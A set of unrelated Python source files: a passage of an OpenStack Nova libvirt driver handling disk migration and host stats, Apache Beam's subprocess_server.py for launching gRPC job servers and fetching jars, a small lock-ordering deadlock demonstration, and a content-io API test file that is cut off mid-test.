shared_storage = (dest == self.get_host_ip_addr())
if not shared_storage:
tmp_file = uuid.uuid4().hex + '.tmp'
tmp_path = os.path.join(inst_base, tmp_file)
try:
utils.execute('ssh', dest, 'touch', tmp_path)
if os.path.exists(tmp_path):
shared_storage = True
os.unlink(tmp_path)
else:
utils.execute('ssh', dest, 'rm', tmp_path)
except Exception:
pass
return shared_storage
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, network_info,
block_device_info=None):
LOG.debug(_("Starting migrate_disk_and_power_off"),
instance=instance)
disk_info_text = self.get_instance_disk_info(instance['name'],
block_device_info=block_device_info)
disk_info = jsonutils.loads(disk_info_text)
# copy disks to destination
        # rename the instance dir to <name>_resize first, so that shared
        # storage for the instance dir (e.g. NFS) can still be used.
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
shared_storage = self._is_storage_shared_with(dest, inst_base)
# try to create the directory on the remote compute node
# if this fails we pass the exception up the stack so we can catch
# failures here earlier
if not shared_storage:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
self.power_off(instance)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
try:
utils.execute('mv', inst_base, inst_base_resize)
# if we are migrating the instance with shared storage then
# create the directory. If it is a remote node the directory
# has already been created
if shared_storage:
dest = None
utils.execute('mkdir', '-p', inst_base)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if shared_storage:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize,
shared_storage)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance running successfully."), instance=instance)
raise loopingcall.LoopingCallDone()
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
LOG.debug(_("Starting finish_migration"), instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
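        # disk_info here is typically the JSON produced by
        # get_instance_disk_info on the source host during
        # migrate_disk_and_power_off.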
for info in disk_info:
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
size *= unit.Gi
# If we have a non partitioned image that we can extend
# then ensure we're in 'raw' format so we can extend file system.
fmt = info['type']
if (size and fmt == 'qcow2' and
disk.can_resize_image(info['path'], size) and
disk.is_image_partitionless(info['path'], use_cow=True)):
path_raw = info['path'] + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', info['path'], path_raw)
utils.execute('mv', path_raw, info['path'])
fmt = 'raw'
if size:
use_cow = fmt == 'qcow2'
disk.extend(info['path'], size, use_cow=use_cow)
if fmt == 'raw' and CONF.use_cow_images:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
path_qcow = info['path'] + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', info['path'], path_qcow)
utils.execute('mv', path_qcow, info['path'])
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
        # assume _create_image does nothing if a target file exists.
self._create_image(context, instance,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None, inject_files=False)
xml = self.to_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, power_on,
context=context)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert.
"""
try:
shutil.rmtree(inst_base)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def finish_revert_migration(self, instance, network_info,
block_device_info=None, power_on=True):
LOG.debug(_("Starting finish_revert_migration"),
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(nova_context.get_admin_context(),
instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
def get_diagnostics(self, instance):
def get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
domain = self._lookup_by_name(instance['name'])
output = {}
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = get_io_devices(xml)
for disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(disk)
output[disk + "_read_req"] = stats[0]
output[disk + "_read"] = stats[1]
output[disk + "_write_req"] = stats[2]
output[disk + "_write"] = stats[3]
output[disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
# memoryStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
LOG.debug(_('Checking instance files accessibility %s'), instance_path)
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
def _delete_instance_files(self, instance):
# NOTE(mikal): a shim to handle this file not using instance objects
# everywhere. Remove this when that conversion happens.
context = nova_context.get_admin_context()
inst_obj = instance_obj.Instance.get_by_uuid(context, instance['uuid'])
# NOTE(mikal): this code should be pushed up a layer when this shim is
# removed.
attempts = int(inst_obj.system_metadata.get('clean_attempts', '0'))
success = self.delete_instance_files(inst_obj)
inst_obj.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
inst_obj.cleaned = True
inst_obj.save(context)
def delete_instance_files(self, instance):
target = libvirt_utils.get_instance_path(instance)
if os.path.exists(target):
LOG.info(_('Deleting instance files %s'), target,
instance=instance)
try:
shutil.rmtree(target)
except OSError as e:
LOG.error(_('Failed to cleanup directory %(target)s: '
'%(e)s'), {'target': target, 'e': e},
instance=instance)
# It is possible that the delete failed, if so don't mark the instance
# as cleaned.
if os.path.exists(target):
LOG.info(_('Deletion of %s failed'), target, instance=instance)
return False
LOG.info(_('Deletion of %s complete'), target, instance=instance)
return True
@property
def need_legacy_block_device_info(self):
return False
def default_root_device_name(self, instance, image_meta, root_bdm):
disk_bus = blockinfo.get_disk_bus_for_device_type(CONF.libvirt_type,
image_meta,
"disk")
cdrom_bus = blockinfo.get_disk_bus_for_device_type(CONF.libvirt_type,
image_meta,
"cdrom")
root_info = blockinfo.get_root_info(CONF.libvirt_type,
image_meta, root_bdm,
disk_bus, cdrom_bus)
return block_device.prepend_dev(root_info['dev'])
def default_device_names_for_instance(self, instance, root_device_name,
*block_device_lists):
ephemerals, swap, block_device_mapping = block_device_lists[:3]
def _update_func(bdm):
bdm_id = bdm.get('id')
self.virtapi.block_device_mapping_update(
nova_context.get_admin_context(),
bdm_id, bdm)
blockinfo.default_device_names(CONF.libvirt_type,
instance, root_device_name,
_update_func,
ephemerals, swap,
block_device_mapping)
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
        If 'refresh' is True, update the stats first.
"""
if refresh or not self._stats:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = (self.driver.
get_disk_over_committed_size_total())
# Disk available least size
available_least = disk_free_gb * unit.Gi - disk_over_committed
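            # Worked example: 100 GiB free with 20 GiB over-committed gives a
            # disk_available_least of 80 GiB.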
return (available_least / unit.Gi)
LOG.debug(_("Updating host stats"))
disk_info_dict = self.driver.get_local_gb_info()
data = {}
#NOTE(dprince): calling capabilities before getVersion works around
# an initialization issue with some versions of Libvirt (1.0.5.5).
# See: https://bugzilla.redhat.com/show_bug.cgi?id=1000116
# See: https://bugs.launchpad.net/nova/+bug/1215593
data["supported_instances"] = \
self.driver.get_instance_capabilities()
data["vcpus"] = self.driver.get_vcpu_total()
data["memory_mb"] = self.driver.get_memory_mb_total()
data["local_gb"] = disk_info_dict['total']
data["vcpus_used"] = self.driver.get_vcpu_used()
data["memory_mb_used"] = self.driver.get_memory_mb_used()
data["local_gb_used"] = disk_info_dict['used']
data["hypervisor_type"] = self.driver.get_hypervisor_type()
data["hypervisor_version"] = self.driver.get_hypervisor_version()
data["hypervisor_hostname"] = self.driver.get_hypervisor_hostname()
data["cpu_info"] = self.driver.get_cpu_info()
data['disk_available_least'] = _get_disk_available_least()
data['pci_passthrough_devices'] = \
self.driver.get_pci_passthrough_devices()
self._stats = data
return data
|
subprocess_server.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
import contextlib
import glob
import hashlib
import logging
import os
import re
import shutil
import signal
import socket
import subprocess
import tempfile
import threading
import time
import zipfile
from urllib.error import URLError
from urllib.request import urlopen
import grpc
from apache_beam.version import __version__ as beam_version
_LOGGER = logging.getLogger(__name__)
class SubprocessServer(object):
"""An abstract base class for running GRPC Servers as an external process.
This class acts as a context which will start up a server, provides a stub
to connect to it, and then shuts the server down. For example::
with SubprocessServer(GrpcStubClass, [executable, arg, ...]) as stub:
stub.CallService(...)
"""
def __init__(self, stub_class, cmd, port=None):
"""Creates the server object.
:param stub_class: the auto-generated GRPC client stub class used for
connecting to the GRPC service
:param cmd: command (including arguments) for starting up the server,
        suitable for passing to `subprocess.Popen`.
:param port: (optional) the port at which the subprocess will serve its
service. If not given, one will be randomly chosen and the special
string "{{PORT}}" will be substituted in the command line arguments
with the chosen port.
"""
self._process_lock = threading.RLock()
self._process = None
self._stub_class = stub_class
self._cmd = [str(arg) for arg in cmd]
self._port = port
def __enter__(self):
return self.start()
def __exit__(self, *unused_args):
self.stop()
def start(self):
try:
endpoint = self.start_process()
wait_secs = .1
channel_options = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
channel = grpc.insecure_channel(endpoint, options=channel_options)
channel_ready = grpc.channel_ready_future(channel)
while True:
if self._process is not None and self._process.poll() is not None:
_LOGGER.error("Starting job service with %s", self._process.args)
raise RuntimeError(
'Service failed to start up with error %s' % self._process.poll())
try:
channel_ready.result(timeout=wait_secs)
break
except (grpc.FutureTimeoutError, grpc.RpcError):
wait_secs *= 1.2
logging.log(
logging.WARNING if wait_secs > 1 else logging.DEBUG,
'Waiting for grpc channel to be ready at %s.',
endpoint)
return self._stub_class(channel)
except: # pylint: disable=bare-except
_LOGGER.exception("Error bringing up service")
self.stop()
raise
def start_process(self):
with self._process_lock:
if self._process:
self.stop()
if self._port:
port = self._port
cmd = self._cmd
else:
port, = pick_port(None)
cmd = [arg.replace('{{PORT}}', str(port)) for arg in self._cmd]
endpoint = 'localhost:%s' % port
_LOGGER.info("Starting service with %s", str(cmd).replace("',", "'"))
self._process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# Emit the output of this command as info level logging.
def log_stdout():
line = self._process.stdout.readline()
while line:
# Remove newline via rstrip() to not print an empty line
_LOGGER.info(line.rstrip())
line = self._process.stdout.readline()
t = threading.Thread(target=log_stdout)
t.daemon = True
t.start()
return endpoint
def stop(self):
self.stop_process()
def stop_process(self):
with self._process_lock:
if not self._process:
return
for _ in range(5):
if self._process.poll() is not None:
break
logging.debug("Sending SIGINT to job_server")
self._process.send_signal(signal.SIGINT)
time.sleep(1)
if self._process.poll() is None:
self._process.kill()
self._process = None
def local_temp_dir(self, **kwargs):
return tempfile.mkdtemp(dir=self._local_temp_root, **kwargs)
class JavaJarServer(SubprocessServer):
APACHE_REPOSITORY = 'https://repo.maven.apache.org/maven2'
BEAM_GROUP_ID = 'org.apache.beam'
JAR_CACHE = os.path.expanduser("~/.apache_beam/cache/jars")
_BEAM_SERVICES = type(
'local', (threading.local, ),
dict(__init__=lambda self: setattr(self, 'replacements', {})))()
def __init__(self, stub_class, path_to_jar, java_arguments, classpath=None):
if classpath:
# java -jar ignores the classpath, so we make a new jar that embeds
# the requested classpath.
path_to_jar = self.make_classpath_jar(path_to_jar, classpath)
super().__init__(
stub_class, ['java', '-jar', path_to_jar] + list(java_arguments))
self._existing_service = path_to_jar if _is_service_endpoint(
path_to_jar) else None
def start_process(self):
if self._existing_service:
return self._existing_service
else:
if not shutil.which('java'):
raise RuntimeError(
'Java must be installed on this system to use this '
'transform/runner.')
return super().start_process()
def stop_process(self):
if self._existing_service:
pass
else:
return super().stop_process()
@classmethod
def jar_name(cls, artifact_id, version, classifier=None, appendix=None):
return '-'.join(
filter(None, [artifact_id, appendix, version, classifier])) + '.jar'
@classmethod
def path_to_maven_jar(
cls,
artifact_id,
group_id,
version,
repository=APACHE_REPOSITORY,
classifier=None,
appendix=None):
return '/'.join([
repository,
group_id.replace('.', '/'),
artifact_id,
version,
cls.jar_name(artifact_id, version, classifier, appendix)
])
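  # Illustrative example (hypothetical coordinates): path_to_maven_jar(
  #     'beam-runners-flink-job-server', 'org.apache.beam', '2.30.0')
  # resolves to
  # https://repo.maven.apache.org/maven2/org/apache/beam/beam-runners-flink-job-server/2.30.0/beam-runners-flink-job-server-2.30.0.jar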
@classmethod
def path_to_beam_jar(
cls,
gradle_target,
appendix=None,
version=beam_version,
artifact_id=None):
if gradle_target in cls._BEAM_SERVICES.replacements:
return cls._BEAM_SERVICES.replacements[gradle_target]
gradle_package = gradle_target.strip(':').rsplit(':', 1)[0]
if not artifact_id:
artifact_id = 'beam-' + gradle_package.replace(':', '-')
project_root = os.path.sep.join(
os.path.abspath(__file__).split(os.path.sep)[:-5])
local_path = os.path.join(
project_root,
gradle_package.replace(':', os.path.sep),
'build',
'libs',
cls.jar_name(
artifact_id,
version.replace('.dev', ''),
classifier='SNAPSHOT',
appendix=appendix))
if os.path.exists(local_path):
_LOGGER.info('Using pre-built snapshot at %s', local_path)
return local_path
elif '.dev' in version:
# TODO: Attempt to use nightly snapshots?
raise RuntimeError(
(
'%s not found. '
'Please build the server with \n cd %s; ./gradlew %s') %
(local_path, os.path.abspath(project_root), gradle_target))
else:
return cls.path_to_maven_jar(
artifact_id,
cls.BEAM_GROUP_ID,
version,
cls.APACHE_REPOSITORY,
appendix=appendix)
@classmethod
def local_jar(cls, url, cache_dir=None):
if cache_dir is None:
cache_dir = cls.JAR_CACHE
# TODO: Verify checksum?
if _is_service_endpoint(url):
return url
elif os.path.exists(url):
return url
else:
cached_jar = os.path.join(cache_dir, os.path.basename(url))
if os.path.exists(cached_jar):
_LOGGER.info('Using cached job server jar from %s' % url)
else:
_LOGGER.info('Downloading job server jar from %s' % url)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
# TODO: Clean up this cache according to some policy.
try:
url_read = urlopen(url)
with open(cached_jar + '.tmp', 'wb') as jar_write:
shutil.copyfileobj(url_read, jar_write, length=1 << 20)
os.rename(cached_jar + '.tmp', cached_jar)
except URLError as e:
raise RuntimeError(
'Unable to fetch remote job server jar at %s: %s' % (url, e))
return cached_jar
@classmethod
@contextlib.contextmanager
def beam_services(cls, replacements):
try:
old = cls._BEAM_SERVICES.replacements
cls._BEAM_SERVICES.replacements = dict(old, **replacements)
yield
finally:
cls._BEAM_SERVICES.replacements = old
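  # Usage sketch (target name is illustrative): temporarily map a gradle
  # target to an already-running endpoint or a specific jar, bypassing the
  # normal jar resolution in path_to_beam_jar():
  #   with JavaJarServer.beam_services(
  #       {':sdks:java:io:expansion-service:shadowJar': 'localhost:8097'}):
  #       ...  # path_to_beam_jar() now returns 'localhost:8097' for that target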
@classmethod
def make_classpath_jar(cls, main_jar, extra_jars, cache_dir=None):
if cache_dir is None:
cache_dir = cls.JAR_CACHE
composite_jar_dir = os.path.join(cache_dir, 'composite-jars')
os.makedirs(composite_jar_dir, exist_ok=True)
classpath = []
# Class-Path references from a jar must be relative, so we create
# a relatively-addressable subdirectory with symlinks to all the
# required jars.
for pattern in [main_jar] + list(extra_jars):
for path in glob.glob(pattern) or [pattern]:
path = os.path.abspath(path)
rel_path = hashlib.sha256(
path.encode('utf-8')).hexdigest() + os.path.splitext(path)[1]
classpath.append(rel_path)
if not os.path.lexists(os.path.join(composite_jar_dir, rel_path)):
os.symlink(path, os.path.join(composite_jar_dir, rel_path))
# Now create a single jar that simply references the rest and has the same
# main class as main_jar.
composite_jar = os.path.join(
composite_jar_dir,
hashlib.sha256(' '.join(sorted(classpath)).encode('ascii')).hexdigest()
+ '.jar')
if not os.path.exists(composite_jar):
with zipfile.ZipFile(main_jar) as main:
with main.open('META-INF/MANIFEST.MF') as manifest:
main_class = next(
filter(lambda line: line.startswith(b'Main-Class: '), manifest))
with zipfile.ZipFile(composite_jar + '.tmp', 'w') as composite:
with composite.open('META-INF/MANIFEST.MF', 'w') as manifest:
manifest.write(b'Manifest-Version: 1.0\n')
manifest.write(main_class)
manifest.write(
b'Class-Path: ' + ' '.join(classpath).encode('ascii') + b'\n')
os.rename(composite_jar + '.tmp', composite_jar)
return composite_jar
def _is_service_endpoint(path):
return re.match(r'^[a-zA-Z0-9.-]+:\d+$', path)
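# Matches plain host:port strings such as "localhost:8099" or "10.0.0.1:8099";
# filesystem paths and URLs with a scheme do not match.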
def pick_port(*ports):
"""
Returns a list of ports, same length as input ports list, but replaces
all None or 0 ports with a random free port.
"""
sockets = []
def find_free_port(port):
if port:
return port
else:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except OSError as e:
# [Errno 97] Address family not supported by protocol
# Likely indicates we are in an IPv6-only environment (BEAM-10618). Try
# again with AF_INET6.
if e.errno == 97:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
raise e
sockets.append(s)
s.bind(('localhost', 0))
return s.getsockname()[1]
ports = list(map(find_free_port, ports))
# Close sockets only now to avoid the same port to be chosen twice
for s in sockets:
s.close()
return ports
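# Usage sketch: pick_port(None) returns a one-element list with a free port,
# while pick_port(8080, None, 0) keeps 8080 and fills the None/0 slots with
# distinct free ports (the probe sockets are closed only at the end so the
# same port is not handed out twice).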
|
sample_deadlock.py
|
import time
import threading
lock_a = threading.Lock()
lock_b = threading.Lock()
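# task1 acquires lock_a and then lock_b, while task2 acquires lock_b and then
# lock_a. Each thread sleeps while holding its first lock, so both end up
# waiting forever for the lock the other thread holds: a classic deadlock
# caused by inconsistent lock ordering.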
def task1():
print('Task 1 is starting...')
print('Task 1 is waiting to acquire Lock A')
with lock_a:
print('Task 1 has acquired Lock A')
print('Task 1 is doing some calculations')
time.sleep(2)
print('Task 1 is waiting to acquire Lock B')
with lock_b:
print('Task 1 has acquired Lock B')
print('Task 1 is doing some calculations')
time.sleep(2)
print('Task 1 is releasing both locks')
def task2():
print('Task 2 is starting...')
print('Task 2 is waiting to acquire Lock B')
with lock_b:
print('Task 2 has acquired Lock B')
print('Task 2 is doing some calculations')
time.sleep(5)
print('Task 2 is waiting to acquire Lock A')
with lock_a:
print('Task 2 has acquired Lock A')
print('Task 2 is doing some calculations')
time.sleep(5)
print('Task 2 is releasing both locks')
if __name__ == '__main__':
t1 = threading.Thread(target=task1)
t2 = threading.Thread(target=task2)
t1.start()
t2.start()
t1.join()
t2.join()
|
test_api.py
|
import cio
import six
import threading
from cio.backends import cache
from cio.conf import settings
from cio.conf.exceptions import ImproperlyConfigured
from cio.pipeline import pipeline
from cio.backends import storage
from cio.backends.exceptions import NodeDoesNotExist
from cio.utils.uri import URI
from tests import BaseTest
class ApiTest(BaseTest):
def setUp(self):
super(ApiTest, self).setUp()
from cio.conf import settings
settings.configure(
PLUGINS=[
'cio.plugins.txt.TextPlugin',
'cio.plugins.md.MarkdownPlugin',
'tests.UppercasePlugin'
]
)
def test_get(self):
node = cio.get('label/email', default=u'fallback')
self.assertEqual(node.content, u'fallback')
self.assertEqual(node.initial_uri, 'label/email')
self.assertEqual(node.uri, 'i18n://sv-se@label/email.txt')
def test_get_with_empty_default(self):
node = cio.get('page/title', default=u'', lazy=False)
self.assertEqual(node.content, u'')
node = cio.get('page/body', default=None, lazy=False)
self.assertIsNone(node.content)
        # Testing the same non-existing URIs twice to assert the cache handles None/"" defaults
node = cio.get('page/title', default=u'', lazy=False)
self.assertEqual(node.content, u'')
node = cio.get('page/body', default=None, lazy=False)
self.assertIsNone(node.content)
def test_get_with_context(self):
node = cio.get('page/title', default=u'{Welcome} {firstname} {lastname}!')
content = node.render(firstname=u'Jonas', lastname=u'Lundberg')
self.assertEqual(content, u'{Welcome} Jonas Lundberg!')
def test_get_with_local_cache_pipe_settings(self):
def assert_local_thread():
settings.configure(local=True, CACHE={'PIPE': {'CACHE_ON_GET': False}})
self.assertIn('BACKEND', settings.CACHE, 'Cache settings should be merged')
            # Test twice to verify that the first get() does not cache the response in the pipeline
with self.assertCache(calls=1, misses=1, hits=0, sets=0):
cio.get('local/settings', default=u'default', lazy=False)
with self.assertCache(calls=1, misses=1, hits=0, sets=0):
cio.get('local/settings', default=u'default', lazy=False)
thread = threading.Thread(target=assert_local_thread)
thread.start()
thread.join()
# Back on main thread, settings should not be affected
        # Test twice to make sure the first get() caches the response in the pipeline
with self.assertCache(calls=2, misses=1, hits=0, sets=1):
cio.get('local/settings', default=u'default', lazy=False)
with self.assertCache(calls=1, misses=0, hits=1, sets=0):
cio.get('local/settings', default=u'default', lazy=False)
def test_set(self):
with self.assertRaises(URI.Invalid):
cio.set('page/title', 'fail')
with self.assertRaises(URI.Invalid):
cio.set('page/title.txt', 'fail')
node = cio.set('i18n://sv-se@label/email.up', u'e-post')
self.assertEqual(node.uri, 'i18n://sv-se@label/email.up#1')
cache.clear()
node = cio.get('label/email', u'fallback')
self.assertEqual(node.content, u'E-POST')
self.assertEqual(node.uri, 'i18n://sv-se@label/email.up#1')
self.assertEqual(node.initial, u'fallback')
self.assertEqual(len(node.meta.keys()), 0) # No meta returned from non-versioned api get
self.assertEqual(repr(node._node), '<Node: i18n://sv-se@label/email.up#1>')
self.assertEqual(node.for_json(), {
'uri': node.uri,
'content': node.content,
'meta': node.meta
})
node = cio.set('sv-se@label/email', u'e-post', publish=False)
self.assertEqual(node.uri, 'i18n://sv-se@label/email.txt#draft')
self.assertKeys(node.meta, 'modified_at', 'is_published')
node = cio.publish(node.uri)
self.assertKeys(node.meta, 'modified_at', 'published_at', 'is_published')
self.assertTrue(node.meta['is_published'])
node = cio.get('label/email')
self.assertEqual(node.uri, 'i18n://sv-se@label/email.txt#2')
self.assertEqual(node.content, u'e-post')
self.assertEqual(node.uri.ext, 'txt')
self.assertEqual(len(node.meta.keys()), 0)
# Try publish non-existing node/uri
node = cio.publish('i18n://sv-se@foo/bar.txt#draft')
self.assertIsNone(node)
def test_delete(self):
with self.assertRaises(URI.Invalid):
cio.delete('foo/bar')
node = cio.set('i18n://sv-se@label/email.txt', u'e-post')
uri = node.uri
self.assertEqual(cache.get(uri)['content'], u'e-post')
uris = cio.delete('sv-se@label/email#1', 'sv-se@foo/bar')
self.assertListEqual(uris, ['sv-se@label/email#1'])
with self.assertRaises(NodeDoesNotExist):
storage.get(uri)
self.assertIsNone(cache.get(uri))
def test_revisions(self):
def assertRevisions(*revs):
revisions = set(cio.revisions('i18n://sv-se@page/title'))
assert revisions == set(revs)
self.assertEqual(len(set(cio.revisions('i18n://sv-se@page/title'))), 0)
node = cio.load('sv-se@page/title')
self.assertDictEqual(node, {
'uri': 'i18n://sv-se@page/title.txt',
'data': None,
'content': None,
'meta': {}
})
# First draft
with self.assertDB(selects=1, inserts=1, updates=0):
with self.assertCache(calls=0):
node = cio.set('i18n://sv-se@page/title.txt', u'Content-IO', publish=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt#draft')
assertRevisions(('i18n://sv-se@page/title.txt#draft', False))
self.assertIsNone(cio.get('page/title').content)
# Publish first draft, version 1
with self.assertDB(calls=4, selects=2, updates=2):
with self.assertCache(calls=1, sets=1):
node = cio.publish(node.uri)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt#1')
assertRevisions(('i18n://sv-se@page/title.txt#1', True))
self.assertEqual(cio.get('page/title').content, u'Content-IO')
# Second draft
with self.assertDB(selects=1, inserts=1, updates=0):
with self.assertCache(calls=0):
node = cio.set('i18n://sv-se@page/title.up', u'Content-IO - Fast!', publish=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up#draft')
assertRevisions(('i18n://sv-se@page/title.txt#1', True), ('i18n://sv-se@page/title.up#draft', False))
self.assertEqual(cio.get('page/title').content, u'Content-IO')
# Publish second draft, version 2
with self.assertDB(calls=4, selects=2, updates=2):
with self.assertCache(calls=1, sets=1):
node = cio.publish(node.uri)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up#2')
assertRevisions(('i18n://sv-se@page/title.txt#1', False), ('i18n://sv-se@page/title.up#2', True))
self.assertEqual(cio.get('page/title').content, u'CONTENT-IO - FAST!')
# Alter published version 2
with self.assertDB(calls=2, selects=1, inserts=0, updates=1):
with self.assertCache(calls=0):
node = cio.set('i18n://sv-se@page/title.up#2', u'Content-IO - Lightening fast!', publish=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up#2')
assertRevisions(('i18n://sv-se@page/title.txt#1', False), ('i18n://sv-se@page/title.up#2', True))
self.assertEqual(cio.get('page/title').content, u'CONTENT-IO - FAST!') # Not published, still in cache
# Re-publish version 2, no change
with self.assertDB(selects=1, inserts=0, updates=0):
with self.assertCache(calls=1, sets=1):
node = cio.publish(node.uri)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up#2')
assertRevisions(('i18n://sv-se@page/title.txt#1', False), ('i18n://sv-se@page/title.up#2', True))
self.assertEqual(cio.get('page/title').content, u'CONTENT-IO - LIGHTENING FAST!')
# Rollback version 1
with self.assertDB(calls=3, selects=1, updates=2):
with self.assertCache(calls=1, sets=1):
node = cio.publish('i18n://sv-se@page/title#1')
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt#1')
assertRevisions(('i18n://sv-se@page/title.txt#1', True), ('i18n://sv-se@page/title.up#2', False))
self.assertEqual(cio.get('page/title').content, u'Content-IO')
# Assert get specific version doesn't mess up the cache
cache.clear()
with self.assertCache(calls=0):
self.assertEqual(cio.get('page/title#2').content, u'CONTENT-IO - LIGHTENING FAST!')
with self.assertCache(calls=2, misses=1, sets=1):
self.assertEqual(cio.get('page/title').content, u'Content-IO')
# Load version 1 and 2
data = cio.load('sv-se@page/title#1')
self.assertEqual(data['uri'], 'i18n://sv-se@page/title.txt#1')
self.assertEqual(data['data'], u'Content-IO')
data = cio.load('sv-se@page/title#2')
self.assertEqual(data['uri'], 'i18n://sv-se@page/title.up#2')
self.assertEqual(data['data'], {u'name': u'Content-IO - Lightening fast!'})
# Load without version and expect published version
